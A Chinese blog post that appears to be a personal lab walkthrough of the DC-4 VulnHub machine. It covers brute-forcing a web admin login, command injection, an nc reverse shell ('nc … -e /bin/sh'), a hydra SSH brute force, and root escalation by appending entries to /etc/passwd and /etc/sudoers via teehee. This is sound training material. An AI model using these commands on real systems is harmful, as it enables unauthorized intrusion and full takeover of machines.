DC-4渗透测试过程(个人学习)

已于 2024-05-30 00:12:37 修改
阅读量1.1k 收藏 7
点赞数 10
文章标签: 学习 网络 linux 安全
于 2024-05-30 00:01:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59028058/article/details/139308686
版权

环境安装

链接:https://pan.baidu.com/s/1JzvhR4YoTRXVf_onUP3dXA?pwd=M1ke 
提取码:M1ke 
 

靶机加入到虚拟机后,将攻击机kali和靶机的网络连接模式调为NAT或者桥接,确保在同一网段

攻击机kali的IP地址:192.168.37.129

一、信息收集

查找到靶机的IP地址,可以使用 nmap扫描 或者 arp-scan -l 查看网段存在的IP地址

已知靶机的IP地址,在用nmap扫描这个IP,可以发现80端口和22端口都开放着,则先去访问他的页面

 访问80端口得到的是一个管理员的一个登录页面

二、暴力破解

根据提示这是一个管理员登录页面,则尝试用管理员的用户名对密码进行一个爆破

在 username 框中填入 admin , 点击提交,在burp中抓取这个请求包后,将抓到的包放入“Intruder”

 在数据包中可以提交的内容,对 password 的内容进行暴力,载入一个密码爆破字典

载入成功后开始攻击,爆破结束后根据长度可以发现密码是 happy

 已知用户名为:admin,密码为:happy,登录框中输入用户名密码登录后可以看到一个 “命令”超链接和一个 “登出”的链接

点击"command" 进入到command.php中,可以发现有三个可运行的命令,点击“run”即可执行选择的命令

三、命令执行

 在burp中抓取 执行 “run” 后的数据包可以发现执行的命令

将数据包放入Repeteater 中,尝试更改 radio 中的内容为 cat /etc/passwd ,然后发送,可以看到也有数据回显,虽然抓到的包用 “+” 绕过空格,可似乎不需要绕过,直接空格也可以

建立反弹shell

既然这里存在命令执行漏洞,则可以建立反弹shell

在kali终端中输入:

nc -lvnp 6666

在数据包中输入命令并发送即可建立shell:
 

nc 192.168.37.129 6666 -e /bin/sh

成功建立shell后,利用python来反弹shell

四、 ssh建立连接

建立shell以后,切换到了默认目录下,发现有一个dc-4 文件,发现里面啥也没有

成功建立shell以后,查看suid权限的文件,可以发现 /home目录下有一个jim文件夹

切换到 /home 文件夹中,发现有三个用户文件,分别查看三个文件可以发现charles和sam文件夹内没有文件,只有jim文件夹中有文件

 进入 jim 文件夹中 ,查看存在两个文件和一个 .sh 的脚本文件,可以发现mbox这个文件只能jim用户访问

在 backups 文价夹中,有一个密码文件,猜测jim账户的密码可能在其中

 在kali终端建立一个password.txt 的文件,将文件中的密码复制粘贴到该文件中

 使用kali的hydra工具模块对jim用户进行ssh爆破,命令如下:

hydra ssh://192.168.37.128 -l jim -P password.txt -vV

-l :指定用户爆破

-p:(小写),指定密码破解

-P:(大写),指定密码字典破解

-vV:详情信息显示

 最后得到 jim 账户的密码为 jibril04,便可新建一个终端窗口,进行ssh建立连接

进入jim用户后,查看jim用户的权限

查看 mbox 的内容

 查看是一份邮件,由root用户发送给jim的一个邮件,既然由邮件便要去存储邮件的路径去查看一下,则切换到 /var/mail 路径下,可以看到存在 charles 和 jim 两个文件,charles只能charles才能访问,则先查看 jim 文件的内容

 在jim中可以发现存在 charles 用户的密码,则切换到charles用户或者新建一个窗口建立 charles的ssh连接

 成功切换到charles用户,查看charles文件毫无收获

五、提权 

 方法一:teehee提权

teehee 可以把写入文件内容并不覆盖文件原有内容,功能与tee命令相似

使用 sudo -l 查看charles用户的权限,根据显示可以利用teehee来提权

输入命令:

echo "M1ke::0:0:::/bin.bash" | sudo teehee -a /etc/passwd

创建一个00用户,用户名为“M1ke”,追加到/etc/passwd 中

切换倒“M1ke”用户便提权成功了

方法二:sudoers提权

这种方法是根据b站一位UP主的视频学习的

先查看sudoers文件,复制该命令

 在charles 用户下输入命令:

echo "%charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers 

现在就将用户增加到了sudoers的权限中,密码还是原来charles的密码。

.M1ke.
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-4-Web渗透测试靶机
01-19
总之,DC-4-Web渗透测试靶机提供了一个安全的实验平台,让学习者可以在不危害实际系统的情况下,深入理解Web渗透测试的全过程,增强网络安全防护意识和技能。在使用过程中,不断学习、实践和总结,将有助于你在网络...
DC-4靶机提权超详细过程
02-29
通过对DC-4靶机的权限提升过程学习,我们不仅掌握了基本的渗透测试技巧,还深入了解了如何利用各种工具和技术来进行高效的信息搜集和权限提升。这对于从事网络安全行业的人员来说是非常宝贵的经验积累。在未来的...
DC几个基础命令
WDWCSDN123的博客
03-27 3万+
create_clock clk -period 5 -waveform {0,2.5} 创建一个名为clk,周期为5ns,占空比为50%的时钟 set_dont_touch set_dont_touch_network 设置不希望被DC优化的模块,前者 对cell和net都可以使用,后者只能用于net set_clock_transition 设置时钟转换时间,指从时钟高电平的10%到达时钟高...
Windows DC学习
linux_knew的博客
04-03 851
Windows DC学习 #include <stdio.h> #include <windows.h> #include <math.h> int main(void) { HWND hWnd = FindWindow(NULL, "123.txt - 记事本"); // 获得控制台窗口句柄 int nPos = 0; while (1)...
从零开始学Docker(精髓)
weixin_40781098的博客
11-19 3202
Docker精髓篇说明容器数据卷是什么使用数据卷实战安装mysql匿名挂载具名挂载(推荐使用)指定路径挂载如何区分是具名挂载还是匿名挂载还是指定路径挂载(重要)初识`Dockerfile`数据卷容器 volumes-from两个mysql同步数据结论`Dockerfile`介绍`DockerFile`构建过程`DockerFile`的指令`Dockerfile`制作tomcat镜像发布自己的镜像`Dcoker`网络理解`Docker0`容器互联--link(不建议了)自定义网络查看docker所有网络网络
烟花特效Html
热门推荐
大宽的博客
03-02 5万+
【代码】烟花特效Html。
SpringBoot学习:接口鉴权JWT
大小鱼鱼鱼鱼鱼
06-13 5528
import static org.apache.commons.lang3.StringUtils.defaultIfBlank; import static org.apache.commons.lang3.math.NumberUtils.toInt; import static org.apache.commons.lang3.math.NumberUtils.toLong; /** ...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
『VulnHub系列』DC- 1-Walkthrough.pdf
10-30
文档还提到了一些在渗透测试过程中可能会遇到的常见问题及其解决方案。例如,在得到了一个不稳定的shell时,可能无法使用一些常见的清屏命令,比如clear。在这种情况下,可以设置环境变量TERM为screen来解决问题。...
关于域渗透学习1
08-24
信息收集是渗透测试的首要步骤,包含对目标网络结构的分析。基本命令的使用可以帮助定位域控制器,端口收集和扫描则是为了发现网络中的开放端口和系统信息。通过信息收集和分析,攻击者可以确定下一步的渗透策略。 ...
linux qemu-nbd介绍
rayylee
06-13 1万+
1. NBD(Network Block Device)网络块设备介绍 可以将一个远程主机的磁盘空间,当作一个块设备来使用.就像一块硬盘一样使用它,你可以很方便的将另一台服务器的硬盘空间,增加到本地服务器上。NBD与NFS有所不同,NFS只是提供一个挂载点供客户端使用,客户端无法改变这个挂载点的分区格式,而NBD提供的是一个块设备,客户端可以把这个块设备格式化成各种类型的分区,更便于用户的使用。NBD是一个内核模块,大部分Linux发行版都已包含它。 在centos中, 编译成模块NBD, 保存在 /lib
【黄啊码】PHP实现token验证登录(JWT鉴权登录)
黄啊码
03-29 5593
【黄啊码】PHP实现token验证登录(JWT鉴权登录)
DC综合各种lib library的解释
zyn1347806的博客
07-10 1万+
Target Library: 由ASIC Vendor提供,后缀一般为".db",里面包含标准单元,Verilog文件映射为最后结构级网表的时候,就在里面查找标准单元。综合的最后就是把自己的code转换为vendor提供的单元的过程。 Link Library: 设计中不可避免的要用到一些第三方的IP,这些IP并不是designer设计的而是直接例化使用的。这些第三方的IP比如PLL,编译...
Vulnhub靶机:DC-4暴力破解——新手进阶4
m0_75051044的博客
03-22 1460
本次实验使用了两种破解admin用户密码的方式,明显使用hydra更快,使用brupsuite要对字典commompw.txt中7000多个密码进行暴力破解,时间太长了,所以直接用hydra爆破出来的密码登录,再用bruqsuite进行抓包更改命令,最后获取密码字典,然后接着用hydra爆破。显然还是不用bruqsuite更好。使用了两种提权方式,第一种:添加一个无密码用户,并使用teehee执行写入 passwd中,第二种:通过定时任务执行脚本提权。对比一下第一种提权更快。
DC-4靶机渗透测试
qq_60463414的博客
07-07 2442
DC4靶机shell反弹,提权流程。
Freertos学习笔记
qq_45031559的博客
08-21 609
Freertos学习笔记
零基础学习人工智能—Python—Pytorch学习(六)
最新发布
kiba518的博客
08-21 825
前言 本文主要讲神经网络的上半部分。 这篇文章开始有很多公式了,这些公式都很简单,但是如果是不经常在脑海里思考公式的人,那可能需要多花点时间做一下自我训练,个人感觉,也就几天时间,就能把自己感觉给调整出来。 习惯了公式看下面内容就会轻松很多,另外如果要深入学习人工智能,熟练的认知公式也是个必须的事情。 另外,我发现我前面文章写的有歧义的地方还是挺多,虽然,已经改了一部分,但,可能还有没发现的,大...
学习分享: Java 中调用 API 的一般方式
weixin_71842181的博客
08-19 373
学习分享: Java 中调用 API 的一般方式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值